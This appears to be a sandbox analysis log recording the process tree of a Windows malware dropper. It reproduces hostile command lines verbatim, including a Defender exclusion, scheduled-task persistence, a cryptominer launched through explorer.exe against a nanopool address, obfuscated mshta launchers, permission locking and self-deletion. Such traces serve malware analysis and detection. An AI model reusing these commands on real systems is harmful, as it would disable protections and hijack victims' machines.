setup_install.exe 30 PID 656 wrote to memory of 1876 656 setup_install.exe 30 PID 656 wrote to memory of 1876 656 setup_install.exe 30 PID 656 wrote to memory of 1696 656 setup_install.exe 32 PID 656 wrote to memory of 1696 656 setup_install.exe 32 PID 656 wrote to memory of 1696 656 setup_install.exe 32 PID 656 wrote to memory of 1696 656 setup_install.exe 32 PID 656 wrote to memory of 1696 656 setup_install.exe 32 PID 656 wrote to memory of 1696 656 setup_install.exe 32 PID 656 wrote to memory of 1696 656 setup_install.exe 32 PID 656 wrote to memory of 1700 656 setup_install.exe 38 PID 656 wrote to memory of 1700 656 setup_install.exe 38 PID 656 wrote to memory of 1700 656 setup_install.exe 38 PID 656 wrote to memory of 1700 656 setup_install.exe 38 PID 656 wrote to memory of 1700 656 setup_install.exe 38 PID 656 wrote to memory of 1700 656 setup_install.exe 38 PID 656 wrote to memory of 1700 656 setup_install.exe 38 PID 656 wrote to memory of 1572 656 setup_install.exe 33 PID 656 wrote to memory of 1572 656 setup_install.exe 33 PID 656 wrote to memory of 1572 656 setup_install.exe 33 PID 656 wrote to memory of 1572 656 setup_install.exe 33 PID 656 wrote to memory of 1572 656 setup_install.exe 33 PID 656 wrote to memory of 1572 656 setup_install.exe 33 PID 656 wrote to memory of 1572 656 setup_install.exe 33 PID 656 wrote to memory of 1016 656 setup_install.exe 37 PID 656 wrote to memory of 1016 656 setup_install.exe 37 PID 656 wrote to memory of 1016 656 setup_install.exe 37 PID 656 wrote to memory of 1016 656 setup_install.exe 37 PID 656 wrote to memory of 1016 656 setup_install.exe 37 PID 656 wrote to memory of 1016 656 setup_install.exe 37 PID 656 wrote to memory of 1016 656 setup_install.exe 37 PID 656 wrote to memory of 1748 656 setup_install.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe4⤵
- Loads dropped DLL
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun052bbd8bebd9.exeSun052bbd8bebd9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe4⤵
- Loads dropped DLL
PID:1772 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun05ac1b0207d3ff3b8.exeSun05ac1b0207d3ff3b8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 9766⤵
- Loads dropped DLL
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05532f7abc.exe4⤵
- Loads dropped DLL
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun05532f7abc.exeSun05532f7abc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe4⤵
- Loads dropped DLL
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun059375dac544fc4a.exeSun059375dac544fc4a.exe5⤵
- Executes dropped EXE
PID:1400 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1036 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
PID:2396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:428
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2104
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:1320
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3356
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:3408
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:3380
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2116 -
C:\ProgramData\6881626.exe"C:\ProgramData\6881626.exe"8⤵PID:2712
-
-
C:\ProgramData\5639685.exe"C:\ProgramData\5639685.exe"8⤵
- Executes dropped EXE
PID:2688 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2688 -s 17249⤵
- Program crash
PID:3328
-
-
-
C:\ProgramData\8744887.exe"C:\ProgramData\8744887.exe"8⤵PID:2156
-
C:\ProgramData\8744887.exe"C:\ProgramData\8744887.exe"9⤵PID:1616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 7129⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
-
C:\ProgramData\2211220.exe"C:\ProgramData\2211220.exe"8⤵PID:3056
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\2211220.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\2211220.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))9⤵PID:3004
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\2211220.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\2211220.exe") do taskkill -Im "%~nxl" /F10⤵PID:1120
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "2211220.exe" /F11⤵
- Kills process with taskkill
PID:3976
-
-
C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exEC3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw911⤵PID:1264
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))12⤵PID:3168
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F13⤵PID:2576
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY12⤵PID:1548
-
-
-
-
-
-
C:\ProgramData\444688.exe"C:\ProgramData\444688.exe"8⤵PID:1204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 16969⤵
- Program crash
PID:3432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
PID:2564 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2564 -s 13768⤵
- Program crash
PID:1608
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2984
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:2512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2748
-
C:\Users\Admin\AppData\Local\Temp\is-4BJ53.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4BJ53.tmp\setup_2.tmp" /SL5="$10200,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:1780
-
C:\Users\Admin\AppData\Local\Temp\is-1FHEM.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-1FHEM.tmp\setup_2.tmp" /SL5="$2025A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:2380
-
C:\Users\Admin\AppData\Local\Temp\is-NGS4H.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-NGS4H.tmp\postback.exe" ss111⤵PID:2088
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:3216
-
C:\Users\Admin\AppData\Local\Temp\azbLEaaUu.exe"C:\Users\Admin\AppData\Local\Temp\azbLEaaUu.exe"13⤵PID:988
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im azbLEaaUu.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\azbLEaaUu.exe" & del C:\ProgramData\*.dll & exit14⤵PID:3536
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im azbLEaaUu.exe /f15⤵
- Kills process with taskkill
PID:3232
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 615⤵
- Delays execution with timeout.exe
PID:2040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MaQGaumQa.exe"C:\Users\Admin\AppData\Local\Temp\MaQGaumQa.exe"13⤵PID:3544
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:2900
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:2508
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2976
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:2356
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe4⤵
- Loads dropped DLL
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun05899db881f67fb29.exeSun05899db881f67fb29.exe5⤵
- Executes dropped EXE
PID:944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe4⤵
- Loads dropped DLL
PID:380 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun054fe19a12cb3.exeSun054fe19a12cb3.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:108 -
C:\Users\Admin\AppData\Local\Temp\is-HQ0O3.tmp\Sun054fe19a12cb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-HQ0O3.tmp\Sun054fe19a12cb3.tmp" /SL5="$4012C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun054fe19a12cb3.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\is-N1JHP.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-N1JHP.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Executes dropped EXE
PID:2492 -
C:\Program Files\MSBuild\ZBKWEVAIZM\ultramediaburner.exe"C:\Program Files\MSBuild\ZBKWEVAIZM\ultramediaburner.exe" /VERYSILENT8⤵PID:2448
-
C:\Users\Admin\AppData\Local\Temp\is-4B82O.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-4B82O.tmp\ultramediaburner.tmp" /SL5="$3030E,281924,62464,C:\Program Files\MSBuild\ZBKWEVAIZM\ultramediaburner.exe" /VERYSILENT9⤵PID:2516
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:1516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cd-d93da-9f8-46aae-aed623d6ef91d\Sexatynaexe.exe"C:\Users\Admin\AppData\Local\Temp\cd-d93da-9f8-46aae-aed623d6ef91d\Sexatynaexe.exe"8⤵PID:1140
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:3308
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3308 CREDAT:275457 /prefetch:210⤵PID:3700
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3308 CREDAT:1782792 /prefetch:210⤵PID:4044
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3308 CREDAT:1913877 /prefetch:210⤵PID:5928
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3308 CREDAT:799775 /prefetch:210⤵PID:8908
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3308 CREDAT:275502 /prefetch:210⤵PID:1012
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:2764
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514839⤵PID:5092
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515139⤵PID:8876
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:3360
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631199⤵PID:3820
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942319⤵PID:7680
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=39⤵PID:4172
-
-
-
C:\Users\Admin\AppData\Local\Temp\ea-d8ddb-0ca-d2889-5764265ae21a3\Faequkyxula.exe"C:\Users\Admin\AppData\Local\Temp\ea-d8ddb-0ca-d2889-5764265ae21a3\Faequkyxula.exe"8⤵PID:1100
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i5khlnlu.v0d\GcleanerEU.exe /eufive & exit9⤵PID:1148
-
C:\Users\Admin\AppData\Local\Temp\i5khlnlu.v0d\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\i5khlnlu.v0d\GcleanerEU.exe /eufive10⤵PID:3220
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\i5khlnlu.v0d\GcleanerEU.exe" & exit11⤵PID:920
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:3992
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vycx5wjd.had\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\vycx5wjd.had\installer.exeC:\Users\Admin\AppData\Local\Temp\vycx5wjd.had\installer.exe /qn CAMPAIGN="654"10⤵PID:2924
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\vycx5wjd.had\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\vycx5wjd.had\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631178847 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:3448
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aq5qmoog.v4d\anyname.exe & exit9⤵PID:3248
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yvxn3k2g.m3m\gcleaner.exe /mixfive & exit9⤵PID:2368
-
C:\Users\Admin\AppData\Local\Temp\yvxn3k2g.m3m\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\yvxn3k2g.m3m\gcleaner.exe /mixfive10⤵PID:3688
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\yvxn3k2g.m3m\gcleaner.exe" & exit11⤵PID:2764
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:2768
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3qv5zias.x3t\autosubplayer.exe /S & exit9⤵PID:2704
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe4⤵
- Loads dropped DLL
PID:1748 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun050462125c7d35.exeSun050462125c7d35.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1596 -
C:\ProgramData\395792.exe"C:\ProgramData\395792.exe"6⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2360 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2360 -s 17367⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
-
C:\ProgramData\3530382.exe"C:\ProgramData\3530382.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2444 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2608
-
-
-
C:\ProgramData\5964056.exe"C:\ProgramData\5964056.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 17407⤵
- Program crash
PID:1540
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe4⤵
- Loads dropped DLL
PID:1016 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun05d60bc3b96248e5.exeSun05d60bc3b96248e5.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1836 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2740
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe4⤵
- Loads dropped DLL
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun05640630a6aa.exeSun05640630a6aa.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone4⤵
- Loads dropped DLL
PID:1052 -
C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun05fa3b4d2ae56e.exeSun05fa3b4d2ae56e.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1328 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun05fa3b4d2ae56e.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC15E7A84\Sun05fa3b4d2ae56e.exe" & exit6⤵PID:2512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun05fa3b4d2ae56e.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2320 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2332
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:2476
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1904
-
C:\Users\Admin\AppData\Local\Temp\EFDB.exeC:\Users\Admin\AppData\Local\Temp\EFDB.exe1⤵PID:3936
-
C:\Users\Admin\AppData\Local\Temp\30E1.exeC:\Users\Admin\AppData\Local\Temp\30E1.exe1⤵PID:816
-
C:\Users\Admin\AppData\Local\Temp\aq5qmoog.v4d\anyname.exeC:\Users\Admin\AppData\Local\Temp\aq5qmoog.v4d\anyname.exe1⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\7F6F.exeC:\Users\Admin\AppData\Local\Temp\7F6F.exe1⤵PID:3008
-
C:\Users\Admin\AppData\Local\Temp\7F6F.exeC:\Users\Admin\AppData\Local\Temp\7F6F.exe2⤵PID:2660
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:3824
-
-
C:\Users\Admin\AppData\Local\Temp\7F6F.exe"C:\Users\Admin\AppData\Local\Temp\7F6F.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\7F6F.exe"C:\Users\Admin\AppData\Local\Temp\7F6F.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:3640
-
C:\Users\Admin\AppData\Local\8317ff5b-a200-4631-b45a-29f5ce9ef58c\build2.exe"C:\Users\Admin\AppData\Local\8317ff5b-a200-4631-b45a-29f5ce9ef58c\build2.exe"5⤵PID:3476
-
C:\Users\Admin\AppData\Local\8317ff5b-a200-4631-b45a-29f5ce9ef58c\build2.exe"C:\Users\Admin\AppData\Local\8317ff5b-a200-4631-b45a-29f5ce9ef58c\build2.exe"6⤵PID:2704
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\8317ff5b-a200-4631-b45a-29f5ce9ef58c\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:3248
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:2480
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:2600
-
-
-
-
-
C:\Users\Admin\AppData\Local\8317ff5b-a200-4631-b45a-29f5ce9ef58c\build3.exe"C:\Users\Admin\AppData\Local\8317ff5b-a200-4631-b45a-29f5ce9ef58c\build3.exe"5⤵PID:3152
-
C:\Users\Admin\AppData\Local\8317ff5b-a200-4631-b45a-29f5ce9ef58c\build3.exe"C:\Users\Admin\AppData\Local\8317ff5b-a200-4631-b45a-29f5ce9ef58c\build3.exe"6⤵PID:3840
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:3280
-
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:3984
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3932
-
C:\Users\Admin\AppData\Local\Temp\E073.exeC:\Users\Admin\AppData\Local\Temp\E073.exe1⤵PID:2008
-
